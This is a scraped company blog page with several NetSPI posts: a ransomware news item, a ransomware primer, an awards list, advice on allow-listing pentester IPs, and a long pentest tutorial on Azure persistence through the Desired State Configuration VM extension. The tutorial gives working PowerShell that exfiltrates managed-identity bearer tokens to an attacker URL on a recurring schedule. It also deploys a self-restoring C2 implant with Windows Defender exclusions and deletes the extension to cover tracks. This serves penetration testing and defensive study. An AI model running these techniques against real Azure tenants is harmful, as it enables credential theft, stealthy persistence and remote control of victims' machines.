Back

Minne Inno & MSP Business Journal: NetSPI adds ransomware attack simulation to its penetration testing portfolio

On June 29, 2021, NetSPI President and CEO Aaron Shilts was featured in an article from Minne Inno and Minneapolis/St. Paul Business Journal:

 

Ransomware attacks have recently made headlines as everything from meat suppliers to schools and hospitals are falling prey to the unforgiving data breaches.

Minneapolis-based NetSPI, a network security firm, is now offering a ransomware attack simulation service to help companies protect themselves.

The service works by emulating real-world ransomware attacks to find and fix vulnerabilities in a companies cybersecurity defenses.

“The DNA and the way we deliver our work lends itself well to helping companies with ransomware,” said NetSPI CEO Aaron Shilts.” … We act as a ransomware attacker, using the same attacks, same tools and show them where their weakness would be.” 

Shilts said the simulation not only illuminates where a breach can be made, but how the companies systems responded to the attack.

“That’s a big part of it. If you can detect something soon, you can usually protect it before they take out the entire network,” he said. “If you don’t have the detection capabilities, it will spread very quickly. 

With tens of millions of dollars funneling towards the attackers, many of whom are backed by foreign governments, it seems like a daunting task to stay on pace with the attackers.

However, out of NetSPI’s 225 employees, 150 of them are cyber security experts that research and familiarize themselves with the latest attack patterns.

Shilts said the team is incredibly sharp and “lives and breathes” cybersecurity.

As far as who would benefit the most from the company’s service, Shilts said any operating business is a target to the attacks. 

NetSPI’s work gravitates more towards heavily regulated financial services that store personally identifiable data. But less regulated industries such as K-12, state and local government are high targets because they’re easier to pick-off.

 

To learn more, read the full article here: https://www.bizjournals.com/twincities/inno/stories/news/2021/06/29/netspi-ransom-ware-attack-simulation.html

Back

Ransomware Resiliency 101

What is ransomware?

Ransomware is a type of malware, or malicious software. When infected with ransomware, organizations lose access to their systems and data, and cybercriminals demand a ransom in exchange for releasing the data. In more technical terms, adversaries encrypt your data and require you to pay nominal amounts of money for the decryption key. Typically, a ransom note pops up on a computer explaining the terms of the ransom, including the cost, form of payment, and deadline. 

Not only is the threat of ransomware growing, but the impact of ransomware is also increasing. Attacks are becoming more sophisticated, and requested payments are getting larger. Here are five key ransomware trends to pay attention to right now:

Ransomware trends:

  • The ransomware-as-a-service (RaaS) model is on the rise. With RaaS, attackers do not write the malware, they purchase and spread it. Commissions are paid to the developers for the use of the malware.
  • Remote worker entry points are being targeted much more, including remote desktop, employee access gateways, and VPN access portals.
  • Operational technology is a prime target. According to IBM Security X-Force, 41% of all ransomware attacks targeted organizations with operational technology (OT) networks.
  • Email phishing, admin interfaces, and exploits are common entry points, and drive-by downloads (malvertising, force download, or exploit browser) are becoming more popular.
  • Many threat actors that deploy ransomware attempt to disable backup/recovery capabilities, so victims are forced to pay if they want access to their systems and data.

Is my organization a good target for ransomware? 

Every organization is susceptible to a ransomware attack, but there are a few considerations to be aware of that may increase your chance of falling victim. 

  • Are you in an industry that frequently is targeted by ransomware? It’s common for ransomware families to target multiple organizations in a particular industry given the attack surfaces are similar. 
  • Does your organization prioritize security? There are a few industries that have notoriously underfunded security programs, including higher education, startups, and small businesses.
  • Does your organization store and manage high-value data? The higher value the data is, the greater the appetite for ransomware attacks. It’s more likely an organization will pay the ransom to get its data recovered if the data is extremely sensitive. Read: Healthcare’s Guide to Ryuk Ransomware.

How does ransomware work?

Step 1: Getting in | Adversaries can get into a network in numerous ways. Here are four vectors used to gain initial access:

  1. Phishing links and attachments.
  2. Using weak or default credentials to log into single factor remote management interfaces and desktop platforms such as Citrix, Remote Desktop, and VPN access points.
  3. Exploitation of common security vulnerabilities, including SQL injection, broken authentication, broken access control, and insufficient logging and monitoring.
  4. Unintentional download and execution of malware through obfuscation and/or social engineering techniques (drive-by downloads, malvertising, forced download, or browser exploits).

Step 2: Privilege escalation | Once in, adversaries work to exploit bugs, design flaws, or configuration oversights in an operating system or application to gain access to protected databases, file shares, and business sensitive data.

Step 3: Find and exfiltrate sensitive data | Attackers leverage well known techniques to quickly identify servers that may contain sensitive data and upload the data to systems on the internet. 

Step 4: Ransomware deployment | Now it is time to deploy the malicious ransomware code. Ransomware can take many forms, including: locker (uses screen locking to block basic computer functions), wiper (deletes files on a timer), or crypto (encrypts important data and often includes a kill switch to delete data if the ransom is not paid by a specific time).

Step 5: Get paid for the decryption key | Often ransomware attackers request the ransom is paid in Bitcoin. Once paid, the likelihood of recovering the money is low.  Even when money is returned, you’re not likely to get all of it back. For example, in 2021 the FBI recovered $2.3 million of the $5 million from the Colonial Pipeline attackers. 

Step 6: Extort additional money by threatening to publish exfiltrated data | Adversaries exfiltrate sensitive data early in the ransomware deployment process so that, even if a ransom is paid, they can continue to threaten the organization and make more money.

Should I pay the ransom?

This is not a yes or no question – it depends on the industry regulations, the complexity of the situation, and the business risk. Payments entice bad actors and enable ransomware attacks to continue. Right now, no one is outright prohibiting direct ransomware payments or ransomware insurance claims. If we do not see new regulations restricting ransomware payment, hopefully, we will see governments offering some subsidies to small and medium businesses that can’t afford to partner with security firms but may be considered high-risk targets. 

Best practices for ransomware protection.

While we wait for the global cybersecurity community to work toward a solution, organizations must get proactive about their cybersecurity efforts. Here are seven best practices to follow to protect your organization from a ransomware attack: 

  1. Employee awareness, namely phishing prevention and education. 
  2. Limit your external attack surface. Evaluate what you expose to the internet.
  3. Access management: Multi-factor authentication, strong passwords, and least privilege.
  4. Review and test your data backup plan often.
  5. Perform regular penetration testing to identify and remediate your vulnerabilities.
  6. Put your incident response plan, crisis communications and management plan, and business continuity plans to the test.
  7. Practice ransomware resiliency. The more proactive your security efforts, the better you will be able to prevent, detect, and recover from a ransomware attack. Download NetSPI’s ransomware prevention and detection checklists.

While we wait for the global cybersecurity community to work toward solutions, ransomware resiliency planning is going to become a priority for everyone. For more detailed insight on ransomware attacks, how ransomware works, and how to prevent and detect ransomware, download our Ultimate Guide to Ransomware Attacks

Download the Ultimate Guide to Ransomware Attacks
Back

Azure Persistence with Desired State Configurations

In a previous blog, I described how anyone with the Contributor role in an Azure subscription can run arbitrary scripts on the VMs of that subscription. That blog utilizes the Run Command feature and the Custom Script Extension to execute the payloads. This blog will explore how pentesters can also use the Desired State Configuration (DSC) VM extension to run arbitrary commands, with built-in functionality for recurring commands and persistence.   

Desired State Configuration in Azure

PowerShell Desired State Configuration (DSC) is existing Windows functionality that allows system administrators to declare how a computer should be configured with configuration scripts and resources. This may include installing/running services, local user management, downloading files or running PowerShell scripts. Once enabled, the Local Configuration Manager (LCM) subsystem will automatically and continually monitor the computer’s current configuration, and perform any actions required to apply the desired configuration. 

More recently, Microsoft has brought first-class support for DSC into Azure. This allows Azure administrators to utilize DSC’s powerful functionality to configure and monitor their Azure VMs at the cloud scale. Azure offers two methods of using DSC: Azure Automation State Configuration and the DSC VM extension.

Azure Automation State Configuration vs Desired State Configuration VM Extension

Azure Automation State Configuration allows administrators to use an Azure Automation Account to deploy DSC at scale across their cloud VMs and on-premise systems. This feature is integrated with the Azure Portal and provides a UI to deploy configurations and monitor the systems’ compliance. The DSC artifacts are deployed via a “pull server.” The systems will periodically report their configuration to the Automation Account and retrieve the latest configurations.

While this is very practical functionality, it’s not our best option as pentesters for a couple reasons. First, it’s not a stealthy technique for controlling the target systems. Cloud administrators can easily observe usage of the Automation State Configuration feature in the portal.  Second, when the target systems are updated to pull their DSC artifacts from our Automation Account, this may overwrite legitimate usage of the DSC feature. The target systems may lose their existing configuration, and this may interrupt daily operations. 

We’ll avoid these problems by using the DSC VM extension instead. When using the VM extension, DSC artifacts are pushed to individually targeted systems, instead of being pulled from a centralized Automation Account. When deploying artifacts, we can also check to see if DSC is already in use on the system, and if so, stop the deployment. This prevents us from overwriting existing, legitimate configurations. Lastly, the VM extension can be quickly removed after the DSC artifacts are pushed, making this much more difficult to detect in the Azure portal. The VM extension provides more targeted, fine-grain control and allows us to remain under the radar.

Running Arbitrary Scripts Through the Desired State Configuration VM Extension

While not exactly the intended use, plain PowerShell scripts can be run directly through the DSC VM extension. Other features such as RunCommand and the Custom Script extension are better suited for this, but it is interesting to see that it works (despite not actually providing any configuration). Let’s considering the following PowerShell script:

echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt

DSCHello.ps1

To setup the script as a DSC, we’ll run the following commands from our workstation:

  1. The Publish-AzVMDscConfiguration cmdlet will compress and upload the script to a storage account of our choice.
  2. The Set-AzVMDscExtension cmdlet will add the DSC VM extension to the “jk-dsc-testing” VM. Once the extension is added, it will automatically download the script from the storage account and run it. 
PS C:\> Publish-AzVMDscConfiguration -ConfigurationPath .\DSCHello.ps1 -ResourceGroupName tester -StorageAccountName <your-storage-account-name> 
[TRUNCATED]

PS C:\> Set-AzVMDscExtension -VMName jk-dsc-testing -ConfigurationArchive "DSCHello.ps1.zip" -ConfigurationName "DSCHello" -ResourceGroupName tester -ArchiveStorageAccountName <your-storage-account-name> -Version "2.83"
Set-AzVMDscExtension : Long running operation failed with status 'Failed'. Additional Info:'VM has reported a failure when processing extension 'Microsoft.Powershell.DSC'. [TRUNCATED]

After about a minute, the second Set-AzVMDscExtension command returns an error. This is expected because our DSCHello.ps1 script does not actually include a valid DSC configuration. Despite this error, our script was executed on the target VM. We can confirm this by using the RunCommand feature to check the contents of the output file: C:\dsc_hello.txt. 

RunCommand Output
RunCommand Output

The output within the file confirms that the script was executed successfully, despite the error returned by the Set-AzVMDscExtension command. It also confirms that our script is running as SYSTEM on the VM. 

While it’s nice to know that the DSC VM extension can be used for one-off scripts, there are better tools for this task at our disposal. We’ll instead focus on utilizing the power of DSC for our more common tasks as pentesters. 

Practical DSC Extension Usage

While the above process does result in privileged script execution, it doesn’t maximize the functionality offered by the DSC VM extension. We can improve upon this in several ways. 

Using Actual DSC Configuration Artifacts

The simplest improvement is to add an actual configuration to our script. There are many different types of DSC Resources that can be used within a DSC configuration. The most versatile is the Script Resource which we’ll use to wrap whatever functionality we’d like to deploy. If we were rewriting the above example to use a Script Resource, that would appear in our DSC script as:

Configuration DSCHello
{
	Node localhost
	{
		Script ScriptExample
		{
			SetScript = {
				echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt
			}
			TestScript = { 
				return Test-Path C:\dsc_hello.txt 
			}
			GetScript = { @{ Result = (Get-Content C:\dsc_hello.txt) } }
		}
	}
}

DSCHello.ps1 (with Configuration and Script Resource)

When deployed via the DSC VM extension with the previous commands, the Set-AzVMDscExtension command will now complete successfully because we’ve provided a well-formed DSC configuration. We’ve also provided a TestScript which will test for the presence of the C:\dsc_hello.txt output file. 

Automatic Recurring Execution

One of the key features of DSC is the capability to detect if a system has drifted from its desired state, and to automatically apply any necessary configuration changes. We can use this built-in functionality to automatically run our commands as many times as we’d like. We’ll see some additional examples of this later in the post, but for now we’ll continue the example from above. Note the TestScript ScriptBlock in the previous code segment. If the C:\dsc_hello.txt file is ever removed from the file system after the initial execution, the TestScript command will return false, and the SetScript command will be run again. 

While this capability is built into DSC, it’s not enabled by default. But we can enable it while deploying our DSC artifacts to the target system. To do that, we’ll prepend the following commands to our growing DSCHello.ps1 script. 

[DscLocalConfigurationManager()]
Configuration DscMetaConfigs
{
	Node localhost
    {
		Settings
        {
             RefreshFrequencyMins           = 30
             RefreshMode                    = 'PUSH'
             ConfigurationMode              = 'ApplyAndAutoCorrect'
             AllowModuleOverwrite           = $False
             RebootNodeIfNeeded             = $False
             ActionAfterReboot              = 'ContinueConfiguration'
             ConfigurationModeFrequencyMins = 15
        }
	}
}
DscMetaConfigs -Output .\output\
Set-DscLocalConfigurationManager -Path .\output\

Commands to be added to DSCHello.ps1 to enable automatic recurring execution.

These commands will update the DSC Local Configuration Manager (LCM), which is the subsystem responsible for keeping the system in its configured desired state. The key update is changing the “ConfigurationMode” value to “ApplyAndAutoCorrect” to ensure our SetScript commands are executed whenever the TestScript block returns false. After this update, the LCM will check the system’s configuration every 15 minutes and applies any necessary configurations. Unfortunately, this is the most frequent schedule that can be configured.

Polite Execution: Checking if DSC is Already in Use

As mentioned earlier, we wouldn’t want to make these DSC/LCM updates if the target system is already using DSC for a legitimate purpose. In a standard pentest, this has too high of a risk of disrupting normal functionality. And in a red team scenario, this change could lead to more rapid detection by the blue team. 

To avoid this, we can update our script to check if the system currently has any DSC configuration already applied. By prepending the following commands to our ever-growing DSCHello.ps1 file, the script will first check if there’s an existing configuration, and exit if any exists. 

$type = Get-DscConfigurationStatus | select -ExpandProperty Type
if ( $? -and ($type -ne 'Initial'))
{
    exit
}

Commands to be added to DSCHello.ps1 to exit if DSC is already in use.

With this addition, our DSCHello.ps1 file is complete and ready for deployment. It will confirm that the DSC feature is not already in-use on the target system. It will configure the LCM to automatically re-execute our commands as needed. And it will complete successfully because it provides a well-formed DSC configuration and resource. The complete version of this example script is available for review here.  

Covering Tracks: Removing the DSC VM Extension

After deploying the DSC VM extension, it can be viewed in the Azure Portal under the target VM’s “Extensions” blade. 

Azure Persistence with Desired State Configurations

If you click the “View detailed status” link, there are execution details, including some of the script output. To cover our tracks, we can eliminate this information by simply removing the DSC VM extension itself using the Remove-AzVMDscExtension cmdlet.  This removes the extension information from the portal and deletes the deployment artifacts from the target VM. However, is does leave behind the existing logs in the C:\WindowsAzure\Logs\Plugins\Microsoft.Powershell.DSC\<VERSION> directory.

Fortunately for us though, this does not remove the deployed DSC configuration from the target VM. If configured as a recurring or persistent task, it will continue to run on the set schedule. We’re free to clean up the extension and artifacts, and still retain our functionality.

Deploying Pre-Configured DSC Artifacts

The official Set-AzVMDscExtension cmdlet is very useful but it assumes that the DSC artifacts to be deployed were uploaded to a caller-controlled storage account using the Publish-AzVMDscConfiguration command. While this is generally true for its intended usage, this is not ideal for pentesters. To use the Set-AzVMDscExtension command against a targeted VM in an engagement, we would have to also upload the DSC artifacts into a storage account within the same Azure subscription using the Publish-AzVMDscConfiguration command. This leaves behind additional artifacts which may be detected by the blue team, and reduces re-usability of our artifacts. 

As a workaround, I’ve added the Invoke-DscVmExtension function to the MicroBurst framework. This is a reimplementation of the Set-AzVMDscExtension cmdet which instead deploys DSC artifacts hosted at any publicly accessible URL. The example DSC artifacts used throughout this blog are hosted in the MicroBurst GitHub repo and available for use. We can use the Invoke-DscVMExtension function to deploy the DSC VM extension and download our pre-made artifacts from there. This greatly increases the reusability of these artifacts. 

Additionally, the Invoke-DscVmExtension function automatically removes the DSC VM extension from the target system after the deployment. This results in a stealthier overall deployment.

We can use this single function to do the following:

  1. Add the DSC VM extension to a target VM which performs the following:
    1. Download the publicly hosted, reusable artifacts from an input URL.
    2. Check if any DSC configurations are already in use.
    3. Update the Local Configuration Manager to automatically run our deployed configuration every 15 minutes. 
    4. Run the provided script as SYSTEM.
  2. Remove the DSC VM extension to cover our tracks in the portal.

And here’s how it looks in action:

PS C:\ > Invoke-DscVmExtension -Name jk-dsc-testing -ResourceGroupName tester  -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DSCHello.ps1.zip"
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Execution of Invoke-DscVmExtension function

Example 1: A Recurring Task to Export Managed Identity Tokens

An Azure VM can be directly assigned permissions to other Azure resources through the VM’s managed identity. NetSPI’s Karl Fosaaen has thoroughly explored how attackers and pentesters can exploit this in his previous blogs. If you’d like a deeper dive into managed identities, I recommend his in-depth review here. In that blog, Karl describes how anyone with command execution on the VM can obtain an access token for that VM’s managed identity by sending an HTTP request to the Azure Metadata Service URL. 

Additionally, NetSPI’s Josh Magri explored in his blog post how bearer tokens can be passed to the Azure REST APIs to perform actions authorized as that identity. This provides a straightforward mechanism for enumerating the target subscription and moving laterally/vertically. 

Let’s combine these concepts with the DSC VM extension. We’ll deploy a DSC configuration which will execute our commands. Our configuration will send a request to the Azure Metadata Service from the target VM and obtain the bearer token for that VM’s managed identity. Once we’ve obtained the bearer token, we’ll exfiltrate it from the server by sending an HTTP POST request to a URL of our choice. 

The full code for the script is available for review here, but the core DSC configuration is included below:

Configuration ExportManagedIdentityToken
{

  param
  (
    [String]
    $ExportURL
  )

  Import-DscResource -ModuleName 'PSDesiredStateConfiguration'

  Node localhost
  {
    Script ScriptExample
    {
      SetScript = {
        $metadataResponse = Invoke-WebRequest -Uri 'https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12
        Invoke-RestMethod -Method 'Post' -URI $using:ExportURL -Body $metadataResponse.Content -ContentType "application/json"
      }
      TestScript = {
        return $false
      }
      GetScript = { return @{result = 'result'} }
    }
  }
} 

The ExportManagedIdentityToken.ps1 Configuration Snippet

In the above configuration, there are a few of key components:

  1. Note that we’re passing in the $ExportURL value as a Configuration parameter. This allows us to re-use the configuration and decide where the bearer token will be exfilitrated at deployment time. 
  2. As described earlier, the SetScript script block obtains the bearer token from the Azure Metadata Service URL and sends it as a POST request to the $ExportURL value.
  3. The TestScript ScriptBlock always returns false. This ensures the commands are executed 15 minutes, guaranteeing we always have a fresh, valid bearer token for extended persistence. 

To receive and process the bearer token sent by the script, we’ll deploy a simple PowerShell Azure Function App to a separate subscription under our control. This will extract the incoming bearer token and call the Azure REST APIs to review the permissions assigned to it. The full code for the Function App is available here and essentially copy-pasted from Josh’s blog in the “Enumeration” section. 

We’ll deploy the script with the Invoke-DscVmExtension function described in the previous section. In this example, we’ll pass the target VM via the pipeline, and we’ll pass the $ExportURL value as a ConfigurationArgument. The function will automatically handle the deployment and cleanup.

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/ExportManagedIdentityToken.ps1.zip" -ConfigurationArgument @{ExportURL="https://[your-function-app].azurewebsites.net/api/TokenEndpoint"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the ExportManagedIdentityToken script via the Invoke-DscVmExtension function

During the deployment, and every 15 minutes thereafter, the bearer token will be POSTed to the Function App. We can monitor the Function App’s logs to observe the incoming value and which permissions are assigned to the managed identity. 

2021-06-08T04:13:45.474 [Information] Executing 'Functions.MgCatchingFunction' (Reason='This function was programmatically called via the host APIs.', Id=d0dd2ee5-6b47-48c6-8bf2-10e74197e769)
2021-06-08T04:13:45.481 [Information] INFORMATION: PowerShell HTTP trigger function processed a request. Incoming JSON contents
2021-06-08T04:13:45.486 [Information] OUTPUT:
2021-06-08T04:13:45.487 [Information] OUTPUT: Name                           Value
2021-06-08T04:13:45.491 [Information] OUTPUT: ----                           -----
2021-06-08T04:13:45.491 [Information] OUTPUT: resource                       https://management.azure.com/
2021-06-08T04:13:45.492 [Information] OUTPUT: access_token                   eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.492 [Information] OUTPUT: expires_on                     1623209325
2021-06-08T04:13:45.492 [Information] OUTPUT: ext_expires_in                 86399
2021-06-08T04:13:45.493 [Information] OUTPUT: token_type                     Bearer
2021-06-08T04:13:45.494 [Information] OUTPUT: client_id                      367d6d5b-cf5f-4818-abb6-b6ea700b377f
2021-06-08T04:13:45.495 [Information] OUTPUT: not_before                     1623122625
2021-06-08T04:13:45.495 [Information] OUTPUT: expires_in                     83700
2021-06-08T04:13:45.495 [Information] INFORMATION: Access token
2021-06-08T04:13:45.496 [Information] OUTPUT: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.496 [Information] INFORMATION: Principal ID
2021-06-08T04:13:45.496 [Information] OUTPUT: 821ace7f-e6d8-4ba2-8304-ef45fbb4fb19
2021-06-08T04:13:45.496 [Information] INFORMATION: /subscriptions/d4[REDACTED]b2/resourcegroups/tester/providers/Microsoft.Compute/virtualMachines/jk-dsc-testing
2021-06-08T04:13:45.497 [Information] INFORMATION: Subscription ID
2021-06-08T04:13:45.497 [Information] OUTPUT: d4[REDACTED]b2
2021-06-08T04:13:45.497 [Information] INFORMATION: VM Name
2021-06-08T04:13:45.497 [Information] OUTPUT: jk-dsc-testing
2021-06-08T04:13:46.001 [Information] OUTPUT: Current identity has permission Reader on scope /subscriptions/d4[REDACTED]b2

Deploying the ExportManagedIdentityToken script via the Invoke-DscVmExtension function

Example 2: A Persistent Command and Control Implant

Using DSC, not only can we execute tasks on a recurring schedule, but we can also utilize its self-correcting behavior to deploy persistent C2 implants on the target VM. In the example below, we’ll be using Covenant as our C2 framework. This will both host our malicious executable and listen for its callback. This blog won’t cover how to use Covenant, but for more information on that topic, please see my previous blog post in which I deployed Covenant’s implants (“grunts”) using Azure’s Custom Script Extension. 

The DeployDSCAgent DSC configuration performs the following tasks:

  1. Create a destination folder for the executable to be downloaded into.
  2. Create a Windows Defender exclusion for the destination folder. 
  3. Create a Windows Defender exclusion for the full path of the executable. 
  4. Create a Windows Defender exclusion for the executable’s process.
  5. Download the hosted implant from the input URL. 
  6. Executes the malicious implant, providing remote control as the SYSTEM process.

The full code for the DSC configuration is relatively simple, but a bit too long to include here. If you’re interested, the code is available for review on GitHub. Deploying the DSC extension to the target VM is as straightforward as before:

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DeployDSCAgent.ps1.zip" -ConfigurationArgument @{ImplantURL="https://172.18.0.5/GruntHTTP40.exe"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the DeployDSCAgent script via the Invoke-DscVmExtension function

A few minutes after the Invoke-DscVmExtension command is started, our Covenant listener will detect that the implant has been executed and is awaiting further commands. 

The Covenant implant is deployed and connects back to the C2 server.
The Covenant implant is deployed and connects back to the C2 server.

The beauty of using DSC for this task is that the status of the above 6 tasks will be automatically checked every 15 minutes. If any of them are incomplete (for example, if a sysadmin deletes our implant, kills the process, or removes the Defender exclusions) then they will be automatically re-executed along with any previous steps. This provides us with robust persistence on the target VM.  

Final Thoughts

We’ve seen how the DSC VM extension provides yet another mechanism for privileged Azure users (such as those with the Contributor role) to achieve command execution on Azure VMs. While other VM extensions provide command execution as well, the DSC VM extension offers built-in support for recurring commands and advanced persistence techniques. The Invoke-DscVmExtension cmdlet added into the MicroBurst framework provides easy reusability of premade, public DSC configurations for use on multiple pentest engagements. All together, the DSC VM extension is robust tool which should be considered for any Azure pentester.  

Back

To Add Value to Your Penetration Testing, Allow List Source IPs

A critical component of an external network penetration test or web application penetration test is to exclude pentester IP addresses from being blocked on the organization’s Intrusion Prevention System (IPS) and Web Application Firewall (WAF) systems. When asked to do this, it is often met with hesitancy. Common concerns I have heard include: 

  • “The findings won’t accurately represent the risks of our attack surface.”
  • “Are we allowing others access too? And will the pentesters reach our internal network?”
  • “If we are paying for a pentest, why should we need to do this additional work to make these temporary configuration changes?”
  • “We are concerned with the efficacy of our IPS/WAF systems and want this to be tested too.”

If pentests aim to test from the perspective of a real threat actor, why would a penetration testing company ask to Allow List their IPs when an attacker would not have the same access? 

It’s true that a pentest simulates threat actors, but its core purpose is to identify all the security gaps that exist in the environment being tested. By nature, a tester cannot truly simulate an adversary because adversaries have unlimited time, while pentesters are typically limited to a few days or weeks. Penetration tests have to bridge the gap and emulate rather than simulate a real attacker – and removing the hurdle of bypassing the IPS/WAF is one critical way to do this. 

IPS/WAF can be bypassed using publicly available tools.

IPS/WAFs are great for protecting against the bots and scanners constantly bombarding your external attack surface, but there are many well-known ways to bypass them using publicly available tools and resources. The documentation for these systems is often found online and can be quite detailed, revealing the sequence of events or probes that typically cause them to take defensive action. Attackers with time can learn how to subvert these technologies by utilizing various tools, proxies, and techniques (read: Dark ReadingOWASPSANSBlack Hat). 

Further, intrusion detection and prevention systems rely on signatures. Oftentimes, these signatures are publicly listed and can be easily thwarted. It is important to remember that, during a web app pentest or external network pentest, the goal is not to test your IPS provider, it is to test your attack surface. 

When trying to conduct pentesting under strict time constraints, it starts to make sense why a pentester would want their IP address to not get blocked by rules or signatures. Given a sophisticated attacker has the time and the ability to bypass IPS/WAF implementations, the philosophy for the intents and purposes of offensive security becomes: (attacker + time + IPS/WAF) = (tester – time – IPS/WAF)

It is unrealistic to expect a pentester to accomplish more in days than a black hat hacker group would in months, or thousands of internet bots with unlimited time. Allow listing is a counterintuitive, but necessary, balancing act. Therefore, the value of a pentest should not be measured by its ability to simulate an adversary, but by the quality of findings it uncovers that an adversary could exploit. 

How allow listing/excluding works.

Allow listing, or excluding, IPs on an IPS/WAF is a configuration change that informs these security solutions to continue alerting, identifying, and blocking malicious traffic as it normally would, except for the traffic coming from the testers IP addresses. Important to note: While pentester IPs should not be blocked, logging and alerting functions should continue as security assessors will consider an organizations visibility into events regarding their attack surface. Most major security vendors allow for this type of configuration. If using a next-generation firewall then it is a change made in the WAF or IPS settings, not on the firewall itself. 

It is not necessary to make changes that allow a tester internal network access as these tests should be conducted only on the public facing, or external attack surface. Allow listing/exclusion is only in place for the duration of the penetration testing and removed immediately after. Source IP addresses that are not associated with pentesters will be treated as they normally would. 

If you want to specifically test your WAF, intrusion detection systems (IDS), or intrusion prevention systems (IPS), a WAF or firewall bypass test, red team operation, or black box assessment may be more appropriate.

The benefits of allow listing/excluding your penetration testers.

Allow listing comes with its own challenges, including immense coordination and alignment with all stakeholders. But its benefits outweigh the challenges. 

When a pentester’s IP addresses are allow listed, more findings can be uncovered in the time allotted, resulting in more fixes, less overall risk, and ultimately greater ROI from the resources allocated to testing. Key benefits include:

  1. More true positive findings
  2. Shorter testing timeframe
  3. Correlate alerts with testers to avoid time wasted triaging 
  4. More accurate results and less false positives

Ultimately, it’s up to security leaders to decide what they want from their penetration test. If breadth and depth, start making moves to allow list IPs. The bottom line is that you’ll get a better return on your penetration testing budget if you enable your pentesters in this way. For answers to some of the most frequently asked questions regarding allow listing IPs during web app pentesting or external network pentesting, continue reading.

Frequently asked questions about allow listing IP addresses during penetration testing:

I get signature updates every day, shouldn’t I be protected?

While this is a best practice, signatures are only as good as the logic that lies within them. Because a signature is intended to detect a new technique, it does not mean that it is guaranteed. There can be different variations of the technique, the signature may not be comprehensive or work properly, there may be too many false positives and the signature gets turned off by the IPS/WAF administrator, among other reasons.

Will allow listing the tester make us vulnerable?

When done correctly, only traffic coming from the testers supplied IP addresses will be subject to not being blocked by that IPS/WAF. Though, the pentester’s traffic should still generate alerts if it is found to be suspicious. The IPS/WAF will still act as it normally would on all other traffic.

What activities will not allow listing a tester affect?

Any active information gathering techniques as well as brute forcing, directory enumeration, unencrypted exploits, and similar activities.

What is the difference between a pentest versus a red team engagement?

A pentest prioritizes issue discovery while a red team engagement is meant to more closely simulate a real threat actor. A red team engagement typically takes longer and does not require allow listing. A red team engagement will take the path of least resistance during an engagement and report on high severity issues that allow compromise, but there will not be mass scanning and issue discovery as there would in a pentest. Often, red team engagements are leveraged by organizations with a more mature security posture.

Can we test the current configuration of our IPS/WAF too?

Yes, any reputable pentest provider should allow for this. Though, it is important to first understand the third-party testing that IPS/WAF vendors undergo. Variations in implementations of IPS/WAF products do exist across different environments, and it can still be valuable to test against the current configuration or implementation. Solutions to this include starting with allow listing on and turning it off near the end to see if findings can still be replicated, turning allow listing off at the beginning and only turning it on if the testers are not making any significant or valuable progress, or contracting an additional engagement with the testing provider to specifically test the IPS/WAF configuration. Conducting a red team engagement can also be valuable for those with a more mature security posture. 

Our MSSP is telling us that allow listing pentester IPs is not possible, what can we do?

This is unlikely. If they will not allow for allow listing, you may want to extend the time scope of the engagement to ensure you are getting quality results. 

Concerned about your organizations cybersecurity? Work with NetSPI's expert pentesters!
Back

Minne Inno announces the 2021 Fire Awards

On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.

The Fire Awards are always meant to be a celebration of the companies and people that keep Minnesota’s tech and startup scene alive.

With this year’s fourth annual Fire Awards, we want to celebrate even harder than ever before after one of the most trying years in memory. That’s why we have the biggest Fire Awards ever, honoring 50 companies from across the state.

We sourced these Fire winners from our readers and added some companies that have made waves in the past year or are on the precipice of big things. Many companies were honored because of the steps they took to help tackle the Covid-19 pandemic.

In July, a Blazer winner will be selected from each category by a panel of judges. Blazer winners are the hottest companies in each category, deserving some extra recognition. More details about that event will come out later this month.

We’ve honored companies in a variety of categories. Startup of the Year is the startup that has risen above the rest in the past year, while the Growing Companies category is for those companies that are a bit smaller but show the potential to be a Startup of the Year down the road. We’re also honoring the organizations that support our ecosystem with the community builder category, as well as a few specific industries like medical devices and health and wellness.

Let’s meet our Fire winners!

High Tech Company:

NetSPI is a Minneapolis-based cybersecurity company that specializes in penetration testing, which is sometimes called ethical hacking. In May, it raised $90 million in venture capital. Its clients include Fortune 500 companies like Medtronic and Microsoft.

Digi Key is an electronics distributor and one of Minnesota’s largest private companies. The Theif River Falls-based company helped the University of Minnesota produce the Coventor, a jerry-rigged ventilator that helped address ventilator shortages during the Covid-19 pandemic.

Arctic Wolf is a transplanted unicorn cybersecurity company. Founded in Silicon Valley, it moved to Eden Prairie in 2020 at the same time it announced a $200 million round of venture capital funding at a valuation of over $1 billion.

Lucy, also known as Equals3, is a Minneapolis-based AI firm that helps Fortune 500 clients manage their data. It raised $3 million in June and plans to double its employee base to over 50 by the end of the year.

Carrot Health is a Minneapolis-based firm that collects consumer data for health plans to help them address what are known as the social determinants of health, or environmental factors that affect people’s health. It has been experiencing 100% growth since it was founded.

